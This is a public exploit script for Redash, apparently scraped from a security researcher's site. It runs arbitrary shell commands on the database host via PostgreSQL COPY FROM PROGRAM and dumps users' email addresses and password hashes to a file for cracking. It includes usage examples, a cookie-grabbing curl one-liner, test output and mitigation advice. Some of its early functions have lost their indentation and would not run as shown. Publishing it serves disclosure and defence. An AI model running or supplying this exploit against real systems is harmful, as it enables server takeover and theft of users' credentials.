# Redash Authenticated Remote Command Execution

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# redash_rce_hash.py
#
# Redash Authenticated Remote Command Execution
#
# Jeremy Brown (jbrown3264/gmail), Dec 2025
#
# =Intro=
#
# Redash's default configuration uses PostgreSQL superuser credentials for data source
# connections. When combined with Redash's intended SQL query execution capability,
# this enables authenticated users to:
#
# 1. Execute arbitrary system commands on the database server via PostgreSQL's
# COPY FROM PROGRAM command
# 2. Extract password hashes from Redash's internal users table via direct SQL queries
#
# The security issue comes from default configuration:
# - Redash's default setup uses PostgreSQL superuser credentials for data sources
# - This grants high privileges to user-submitted queries
# - Combined with lack of database isolation, users can access Redash's auth tables
#
# The vulnerability requires:
# - Authenticated user account on Redash
# - Instance configuration with the default PostgreSQL data source (superuser by default)
#
# Repo and Version Tested
# - https://github.com/getredash/redash
# - redash/redash:25.8.0 (docker image)
#
# =Usage=
#
# redash_rce_hash.py <url> <cookie_file> [--cmd <command> | --dump]
#
# Example: redash_rce_hash.py http://localhost:5000 cookie.txt --cmd "id"
# Example: redash_rce_hash.py http://localhost:5000 cookie.txt --dump
#
# Get cookie from command line (requires user:pass in creds.txt):
# $ IFS=: read user pass < creds.txt; curl -sk -c cookie.txt -b cookie.txt -X POST \
# http://localhost:5000/login \
# -d "email=$user&password=$pass&csrf_token=$(curl -s -c cookie.txt http://localhost:5000/login \
# | grep -oP '(?<=name=\"csrf_token\" value=\")[^\"]*')" >/dev/null 2>&1
#
# =Testing=
#
# $ docker ps | grep redash
# redash/nginx:latest 0.0.0.0:80->80/tcp, [::]:80->80/tcp redash-nginx-1
# redash/redash:25.8.0 5000/tcp redash-adhoc_worker-1
# redash/redash:25.8.0 5000/tcp redash-scheduler-1
# redash/redash:25.8.0 5000/tcp redash-scheduled_worker-1
# redash/redash:25.8.0 5000/tcp redash-worker-1
# redash/redash:25.8.0 0.0.0.0:5000->5000/tcp, [::]:5000->5000/tcp redash-server-1
# pgautoupgrade/pgautoupgrade:17-alpine 5432/tcp redash-postgres-1
# redis:7-alpine 6379/tcp redash-redis-1
#
# $ ./redash_rce_hash.py http://localhost:5000 cookie.txt --cmd "ps"
# [*] Executing command: ps
#
# PID USER TIME COMMAND
# 1 root 0:00 bash /usr/local/bin/docker-entrypoint.sh postgres
# 9 postgres 0:00 postgres
# 31 postgres 0:00 postgres: checkpointer
# 32 postgres 0:00 postgres: background writer
# 34 postgres 0:00 postgres: walwriter
# 35 postgres 0:00 postgres: autovacuum launcher
# 36 postgres 0:00 postgres: logical replication launcher
# 101 postgres 0:00 postgres: postgres postgres 172.18.0.5(52788) idle
# .....
# 324 postgres 0:00 postgres: postgres postgres 172.18.0.6(54688) COPY
# 325 postgres 0:00 postgres: postgres postgres 172.18.0.4(41116) authentication
# 326 postgres 0:00 ps
#
# =Mitigation=
#
# Maintainers were responsive and decided not to make code changes as they view
# it as a configuration issue rather than product vulnerability, as more secure
# database configuration (vs default) may prevent exploitation.
#
# This may be mitigated by:
# - Using non-superuser database credentials for data sources
# - Revoking access to sensitive columns (e.g. password_hash) via column-level permissions
# - Isolating Redash's internal database from user-accessible data sources
#

import sys
import time
import hashlib
import requests
from http.cookiejar import MozillaCookieJar
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

def load_cookies(path):
jar = MozillaCookieJar()
jar.load(path, ignore_discard=True, ignore_expires=True)
return {c.name: c.value for c in jar}

def normalize_url(url):
url = url.rstrip('/')

if url.startswith('http://') or url.startswith('https://'):
return url

for protocol in ['https://', 'http://']:
test_url = f"{protocol}{url}"
try:
resp = requests.head(test_url, verify=False, timeout=3)
return test_url
except:
pass

return f"http://{url}"

def find_api_path(base_url, cookies):
    """Probe likely query_results API prefixes and return the first that responds.

    Multi-org Redash deployments prefix API routes with the org slug, so try
    the bare path plus common org prefixes.  200 (accepted) and 400 (reached
    the endpoint but rejected the body) both prove the path exists.  Falls
    back to the default path if nothing answers.
    """
    session = requests.Session()
    session.cookies.update(cookies)

    candidate_paths = (
        "/api/query_results",
        "/default/api/query_results",
        "/org/api/query_results",
    )

    probe_body = {"query": "SELECT 1", "data_source_id": 1, "parameters": {}}

    for path in candidate_paths:
        try:
            resp = session.post(f"{base_url}{path}", json=probe_body,
                                verify=False, timeout=5)
            if resp.status_code in (200, 400):
                return path
        except requests.RequestException:
            # Network/timeout failure on this path - keep probing.
            # (Previously a bare `except:`.)
            pass

    return candidate_paths[0]

def execute_rce(base_url, cookies, command):
    """Run *command* on the database host via PostgreSQL's COPY FROM PROGRAM.

    Creates a scratch UNLOGGED table (named from the command's MD5 so reruns
    reuse it), pipes the program's stdout into it, and selects it back.
    Handles both the synchronous and asynchronous (job-polling) flows of the
    query_results API.

    Returns the command output as a list of non-empty lines.
    Raises RuntimeError on submission/poll failure and TimeoutError if the
    async job does not finish within 60 seconds.
    """
    session = requests.Session()
    session.cookies.update(cookies)

    api_path = find_api_path(base_url, cookies)
    endpoint = f"{base_url}{api_path}"

    table = f"rce_{hashlib.md5(command.encode()).hexdigest()[:8]}"

    # Double any single quotes so commands containing ' cannot break out of
    # (or prematurely terminate) the SQL string literal.
    sql_command = command.replace("'", "''")

    payload = {
        "query": (
            f"CREATE UNLOGGED TABLE IF NOT EXISTS {table} AS SELECT '1' WHERE 1=0; "
            f"COPY {table} FROM PROGRAM '{sql_command}'; "
            f"SELECT * FROM {table}"
        ),
        "data_source_id": 1,
        "parameters": {}
    }

    resp = session.post(endpoint, json=payload, verify=False, timeout=30)

    if resp.status_code != 200:
        raise RuntimeError(f"Query submission failed: HTTP {resp.status_code} - check credentials / session expiration")

    result = resp.json()

    def rows_to_lines(rows):
        # Single unnamed column: PostgreSQL labels it ?column?.
        return [row.get('?column?', '') for row in rows if row.get('?column?')]

    # Synchronous response: results are inline.
    if 'query_result' in result:
        return rows_to_lines(result['query_result']['data']['rows'])

    # Asynchronous response: poll the job until it settles.
    job_id = result.get('job', {}).get('id')
    if not job_id:
        raise RuntimeError(f"Failed to submit query: {result}")

    deadline = time.time() + 60
    while time.time() < deadline:
        job_resp = session.get(f"{base_url}/api/jobs/{job_id}", verify=False, timeout=15)

        if job_resp.status_code != 200:
            raise RuntimeError(f"Failed to poll job: HTTP {job_resp.status_code}")

        job = job_resp.json().get('job', {})

        if job.get('status') == 3:  # Complete
            result_id = job.get('query_result_id')
            for res_path in (f"/api/query_results/{result_id}",
                             f"/default/api/query_results/{result_id}"):
                try:
                    res = session.get(f"{base_url}{res_path}", verify=False, timeout=30)
                    if res.status_code == 200:
                        return rows_to_lines(res.json()['query_result']['data']['rows'])
                except (requests.RequestException, KeyError, ValueError):
                    # Bad path / malformed body - try the other prefix.
                    # (Previously a bare `except:`.)
                    pass
            raise RuntimeError("Could not fetch query results")

        if job.get('status') == 4:  # Failed
            raise RuntimeError(f"Job failed: {job.get('error')}")

        time.sleep(0.5)

    raise TimeoutError("Job did not complete")

def extract_password_hashes(base_url, cookies):
    """Dump (email, password_hash) pairs from Redash's internal users table.

    Works because the default data source connects to Redash's own Postgres
    database with superuser credentials, so a plain SELECT reaches the auth
    tables - no injection is involved.  Handles both the synchronous and
    asynchronous (job-polling) flows of the query_results API.

    Returns a list of (email, password_hash) tuples, keeping only rows with
    both an email and a well-formed ($-prefixed) hash.
    Raises RuntimeError on submission/poll failure and TimeoutError if the
    async job does not finish within 60 seconds.
    """
    session = requests.Session()
    session.cookies.update(cookies)

    api_path = find_api_path(base_url, cookies)
    endpoint = f"{base_url}{api_path}"

    # Direct query against Redash's own metadata database.
    payload = {
        "query": "SELECT email, password_hash FROM users",
        "data_source_id": 1,
        "parameters": {}
    }

    resp = session.post(endpoint, json=payload, verify=False, timeout=30)

    if resp.status_code != 200:
        raise RuntimeError(f"Query submission failed: HTTP {resp.status_code} - check credentials / session expiration")

    result = resp.json()

    def rows_to_hashes(rows):
        # Filter out rows missing an email or carrying a non-hash value
        # (e.g. SSO accounts with NULL password_hash).
        pairs = []
        for row in rows:
            email = row.get('email') or ''
            password_hash = row.get('password_hash') or ''
            if password_hash and password_hash.startswith('$') and email:
                pairs.append((email, password_hash))
        return pairs

    # Synchronous response: results are inline.
    if 'query_result' in result:
        return rows_to_hashes(result['query_result']['data']['rows'])

    # Asynchronous response: poll the job until it settles.
    job_id = result.get('job', {}).get('id')
    if not job_id:
        raise RuntimeError(f"Failed to submit query: {result}")

    deadline = time.time() + 60
    while time.time() < deadline:
        job_resp = session.get(f"{base_url}/api/jobs/{job_id}", verify=False, timeout=15)

        if job_resp.status_code != 200:
            raise RuntimeError(f"Failed to poll job: HTTP {job_resp.status_code}")

        job = job_resp.json().get('job', {})

        if job.get('status') == 3:  # Complete
            result_id = job.get('query_result_id')
            for res_path in (f"/api/query_results/{result_id}",
                             f"/default/api/query_results/{result_id}"):
                try:
                    res = session.get(f"{base_url}{res_path}", verify=False, timeout=30)
                    if res.status_code == 200:
                        return rows_to_hashes(res.json()['query_result']['data']['rows'])
                except (requests.RequestException, KeyError, ValueError):
                    # Bad path / malformed body - try the other prefix.
                    # (Previously a bare `except:`.)
                    pass
            raise RuntimeError("Could not fetch query results")

        if job.get('status') == 4:  # Failed
            raise RuntimeError(f"Job failed: {job.get('error')}")

        time.sleep(0.5)

    raise TimeoutError("Job did not complete")

def main():
    """Command-line entry point.

    Modes:
      --cmd <command>  run a shell command on the DB host and print its output
      --dump           (default) dump password hashes; also writes hashes.txt
    """
    argv = sys.argv
    if len(argv) < 3:
        print(f"Usage: {argv[0]} <url> <cookie_file> [--cmd <command> | --dump]", file=sys.stderr)
        print(f"", file=sys.stderr)
        print(f"Examples:", file=sys.stderr)
        print(f" {argv[0]} http://localhost:5000 cookie.txt --cmd 'id'", file=sys.stderr)
        print(f" {argv[0]} http://localhost:5000 cookie.txt --dump", file=sys.stderr)
        sys.exit(1)

    url, cookie_file = argv[1], argv[2]

    # Mode selection; --dump is assumed when no flag is given.
    command = None
    mode = "--dump"
    if len(argv) > 3:
        flag = argv[3]
        if flag == "--cmd":
            if len(argv) < 5:
                print("Error: --cmd requires a command argument", file=sys.stderr)
                sys.exit(1)
            mode, command = "--cmd", argv[4]
        elif flag != "--dump":
            print(f"Error: Unknown option {flag}", file=sys.stderr)
            sys.exit(1)

    try:
        url = normalize_url(url)
        cookies = load_cookies(cookie_file)

        if mode == "--cmd":
            print(f"[*] Executing command: {command}\n", file=sys.stderr)
            for line in execute_rce(url, cookies, command):
                print(line)
        else:  # --dump
            print(f"[*] Extracting password hashes...", file=sys.stderr)
            hash_list = extract_password_hashes(url, cookies)
            print(f"[*] Found {len(hash_list)} password hashes\n", file=sys.stderr)

            if not hash_list:
                print("No password hashes found", file=sys.stderr)
                sys.exit(1)

            # Emit email/hash pairs to stdout and save bare hashes for hashcat.
            with open('hashes.txt', 'w') as hash_file:
                for email, password_hash in hash_list:
                    print(email)
                    print(password_hash + "\n")
                    hash_file.write(password_hash + '\n')

            print(f"[*] Hashes written to hashes.txt", file=sys.stderr)

    except Exception as e:
        # SystemExit is a BaseException, so the sys.exit(1) calls above
        # are not swallowed here.
        print(f"Error: {e}", file=sys.stderr)
        sys.exit(1)

if __name__ == "__main__":
    main()
# --- web page footer (scrape residue, commented out so the file parses) ---
# Social Media Share
# About Contact Terms of Use Privacy Policy
# © Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
# All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.